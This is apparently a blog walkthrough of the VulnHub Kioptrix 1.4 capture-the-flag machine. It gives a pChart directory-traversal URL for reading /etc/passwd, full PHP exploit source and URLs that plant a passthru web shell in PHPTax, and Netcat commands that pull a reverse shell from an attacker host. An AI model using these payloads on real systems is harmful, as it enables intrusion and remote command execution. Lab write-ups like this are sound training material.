CTF Walkthroughs, VulnHub

VulnHub – Kioptrix 1.4 Walkthrough

April 24, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux box that involved exploiting a directory traversal vulnerability in the pChart web application in order to access the rules in the Apache configuration file, which revealed a user agent change was necessary to be able to navigate to the PHPTax web application hosted on port 8080, which was affected by a remote code execution vulnerability that could be used to gain remote access to the machine. A simple kernel exploit can then be used to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -oA to save the output in all formats available

The initial Nmap scan has revealed port 22, 80 and 8080 (which are both running HTTP), so the best next steps would be to start investigating HTTP.

Enumerating HTTP (Port 80)

When accessing the web server on port 80 through a browser, a default page is displayed:

Whereas when accessing the web server on port 8080, a 403 forbidden response is displayed:

When inspecting the source code of the home page on port 80, there is a comment mentioning pChart version 2.1.3. pChart is a PHP library that allows to create charts or pictures directly from a web server. You can then display the result in the client browser, sent it by mail or insert it into PDFs.

When navigating to /pChart2.1.3, the web server takes to the home page of the pChart application:

When using the SearchSploit tools to identify known vulnerabilities in pChart, one result appears:

Exploiting Directory Traversal to Access Port 8080

Upon reviewing the exploit information, it appears this version of pChart is affected by a directory traversal vulnerability that can allow an attacker to access files on the web server that are not meant to be accessed from the web application:

Using the following payload to access the /etc/passwd file:

http://10.0.0.153/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

After some enumeration of the system files, it appears this vulnerability by itself isn’t enough to gain remote access to the machine. The Apache configuration file may provide an insight as to why the web application on port 8080 is returning a 403 response, the default location of the config file for Apache 2.2 is /usr/local/etc/apache22/httpd.conf.

Using the directory traversal vulnerability to access the Apache config file reveals that

The configuration file reveals how access to /usr/local/www/apache22/data2 (which presumably is where the web application on port 8080 is stored) is restricted to requests with a Mozilla4 user agent..

Using the User-Agent Switcher and Manager Firefox extension to manually change the user agent to be Mozilla 4:

It appears the web server can now be accessed on port 8080, and it displays a “phptax” entry:

Enumerating HTTP (Port 8080)

When accessing the /phptax directory, the webserver takes to PHPTax, which is a free software that allows users to do their U.S. income taxes, by filling out electronic forms and generating PDF output that can be printed and sent to the IRS.

When using the SearchSploit tool to identify known vulnerabilities in PHPTax, a few remote code execution vulnerabilities come up:

Mirroring the exploit using SearchSploit:

This version of PHPTax is vulnerable to an attack that allows to write and inject code into arbitrary files, as user tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. This could be used to write arbitrary PHP code into a PHP file allowing execution of arbitrary code in the context of the www user.

By looking at the exploit code, it appears users are able to create new files by specifying the file name in the field parameter and the content of the file in the newvalue parameter. The exploit creates a file with the following content:

<?php passthru($_GET[cmd]);?>";

The above payload will allow users to execute arbitrary system commands by navigating to the file and providing the command in the “cmd” parameter. Source code below:

<?php
 
$options = getopt('u:');
   
if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n"); 
   
$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>

Exploiting Remote Code Execution in PHPTax:

The source code somewhat automates the already trivial exploitation process, although it is unnecessary for this exercise. Navigating to the following URL will create the required RCE test.php file:

http://10.0.0.153:8080/phptax/index.php?field=test.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

Navigating to the test.php file and providing a command in the “cmd” parameter allows the execution of commands:

Copying the Laudanum PHP reverse shell to the current working directory and modifying the IP address and port accordingly:

Using the following command to setup a Netcat listener and send the contents of the PHP reverse shell to any incoming request, using the following requests:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on
nc -lvnp 4444 < php-reverse-shell.php

Running the following Netcat command to connect to the listener and redirect the data to a php-reverse-shell.php file:

nc 10.0.0.102 4444 > php-reverse-shell.php

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

The following screen confirms the php-reverse-shell file was downloaded, clicking on it will allow to execute it:

Once executed, a callback in the listener is received, granting a reverse shell as the www user:

Privilege Escalation

Using the uname -a command to identify the current operating system and Kernel version:

It appears the box is running FreeBSD version 9.0. Using SearchSploit to identify known vulnerabilities:

Mirroring the exploit:

Transferring the exploit to the victim machine using Netcat:

Compiling the exploit using the GCC command-line tool and executing it:

Upon executing the exploit, a root-level shell is returned.

Conclusion

This was definitely the hardest machine of the Kioptrix series, and it was also the most interesting one, mainly due to the change in user agent that was required to access the PHPTax web application, as the actual exploits were all pretty simple to executed and required very little coding knowledge.